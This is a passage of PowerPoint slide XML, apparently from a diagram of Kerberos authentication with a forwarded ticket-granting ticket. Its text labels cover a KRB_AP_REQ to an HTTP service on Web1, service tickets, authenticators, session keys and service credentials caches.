                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Forwarded TGT Session Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Forwarded TGT</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="104" name="Picture 10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5610" y="3171831"/>
              <a:ext cx="380199" cy="375562"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="105" name="Picture 10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2381" y="2889963"/>
              <a:ext cx="475522" cy="315018"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="158" name="Picture 1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7569" y="3563775"/>
              <a:ext cx="389339" cy="384591"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="190" name="Picture 1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03" y="3942969"/>
              <a:ext cx="472016" cy="312696"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="191" name="Right Arrow 190"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="747468" y="4005931"/>
              <a:ext cx="143276" cy="170966"/>
            </a:xfrm>
            <a:prstGeom prst="right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de-DE" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="92" name="Server small"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5803243" y="1141480"/>
            <a:ext cx="2795151" cy="1441365"/>
            <a:chOff x="3025668" y="3771580"/>
            <a:chExt cx="2795151" cy="1441365"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="93" name="Picture 9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69693" y="3953993"/>
              <a:ext cx="2651126" cy="1258952"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="94" name="Picture 9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5668" y="3771580"/>
              <a:ext cx="499308" cy="685686"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="95" name="TextBox 94"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3208778" y="4022720"/>
              <a:ext cx="2562935" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="96" name="TextBox 95"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3208778" y="4254546"/>
              <a:ext cx="2562935" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Service Credentials Cache</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="97" name="Picture 9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422319" y="4593843"/>
              <a:ext cx="379222" cy="379222"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="98" name="TextBox 97"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3932492" y="4653136"/>
              <a:ext cx="1575612" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Service Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Right Arrow 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3109495" y="1835509"/>
            <a:ext cx="2502616"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7. KRB_AP_REQ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>HTTP/Web1</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" dirty="0">
              <a:ln w="0"/>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="dk1">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="85" name="Group 84"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3109495" y="2041090"/>
            <a:ext cx="2500581" cy="997024"/>
            <a:chOff x="3338988" y="2446751"/>
            <a:chExt cx="2500581" cy="997024"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="86" name="Group 85"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3338988" y="2446751"/>
              <a:ext cx="2500581" cy="997024"/>
              <a:chOff x="3111530" y="3857261"/>
              <a:chExt cx="2500581" cy="997024"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="89" name="Rectangle 88"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3111530" y="3857261"/>
                <a:ext cx="2500581" cy="99702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spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:endParaRPr lang="de-DE" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="90" name="TextBox 89"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3692408" y="4047198"/>
                <a:ext cx="1671680" cy="623248"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t>Service Ticket</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Authenticator</a:t>
                </a:r>
                <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="87" name="Picture 8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403145" y="2744455"/>
              <a:ext cx="367829" cy="601182"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="88" name="Picture 8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07573" y="2564777"/>
              <a:ext cx="475522" cy="315018"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="91" name="Ticket Content"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5993846" y="2820643"/>
            <a:ext cx="2693477" cy="3143132"/>
            <a:chOff x="5693658" y="2843111"/>
            <a:chExt cx="2693477" cy="3143132"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="99" name="AP_REQ Content"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5693658" y="2843111"/>
              <a:ext cx="2693477" cy="3143132"/>
              <a:chOff x="6158571" y="1914643"/>
              <a:chExt cx="2693477" cy="3143132"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="112" name="AP_REQ Content"/>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158571" y="1914643"/>
                <a:ext cx="2693477" cy="3143132"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="113" name="TextBox 112"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6911533" y="4523428"/>
                <a:ext cx="1054776" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Authenticator</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="114" name="Picture 11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59893" y="4340281"/>
                <a:ext cx="289764" cy="573771"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="115" name="TextBox 114"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6928111" y="3160276"/>
                <a:ext cx="1468864" cy="687368"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="2000"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t>Session Key</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="2000"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>User Credentials</a:t>
                </a:r>
                <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="116" name="Picture 1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flipH="1">
                <a:off x="6592484" y="3593474"/>
                <a:ext cx="225134" cy="308918"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="122" name="Picture 12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544210" y="3118172"/>
                <a:ext cx="311866" cy="311866"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="129" name="TextBox 128"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6200422" y="2128997"/>
                <a:ext cx="2584827" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Use Session Key Flags</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="130" name="TextBox 129"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6200422" y="2433024"/>
                <a:ext cx="2584827" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Mutual Authentication Flag</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="102" name="TextBox 101"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5736630" y="3747856"/>
              <a:ext cx="2583706" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Service Ticket</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="103" name="TextBox 102"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5736630" y="5055254"/>
              <a:ext cx="2583706" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Authenticator</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="106" name="Picture 10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830095" y="5051507"/>
              <a:ext cx="193681" cy="284616"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="111" name="Picture 11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8876" y="3729806"/>
              <a:ext cx="195973" cy="287984"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="131" name="Straight Arrow Connector 130"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="112" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4739845" y="3199865"/>
            <a:ext cx="1254001" cy="1192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4" name="Straight Arrow Connector 143"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5556204" y="5448611"/>
            <a:ext cx="3690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6" name="Picture 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806995" y="4814663"/>
            <a:ext cx="2764253" cy="1267895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="147" name="Picture 14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905059" y="5101920"/>
            <a:ext cx="193681" cy="284616"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="TextBox 147"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2856729" y="5125989"/>
            <a:ext cx="2666999" cy="184666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Additional Authenticator Content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Server Large"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="141998" y="1118879"/>
            <a:ext cx="2814102" cy="3318844"/>
            <a:chOff x="-227909" y="3653786"/>
            <a:chExt cx="2814102" cy="3318844"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="150" name="Picture 1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491" y="3810309"/>
              <a:ext cx="2700684" cy="3162321"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="162" name="TextBox 161"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-52060" y="3896416"/>
              <a:ext cx="2562935" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="163" name="TextBox 162"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-52060" y="4128242"/>
              <a:ext cx="2562935" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Service Credentials Cache</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="164" name="Picture 16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1481" y="4467539"/>
              <a:ext cx="379222" cy="379222"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="165" name="TextBox 164"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="671654" y="4526832"/>
              <a:ext cx="1575612" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Service Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="161" name="Picture 16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7909" y="3653786"/>
              <a:ext cx="499308" cy="685686"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="128" name="Picture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806" y="3293596"/>
            <a:ext cx="348452" cy="348452"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="TextBox 131"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041560" y="3163321"/>
            <a:ext cx="1708145" cy="925894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>Ticket-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
              <a:t>Granting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t> Service Session Key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Ticket-Granting Ticket</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="355909" y="4600144"/>
            <a:ext cx="4627677" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The HTTP service on Web1 was already running</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Therefore it has already got an TGT and the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>corresponding session key.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2967688" y="5320287"/>
            <a:ext cx="2225330" cy="656209"/>
            <a:chOff x="2967688" y="5320287"/>
            <a:chExt cx="2225330" cy="656209"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="141" name="TextBox 140"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3521338" y="5332567"/>
              <a:ext cx="1671680" cy="618118"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Forwarded TGT Session Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
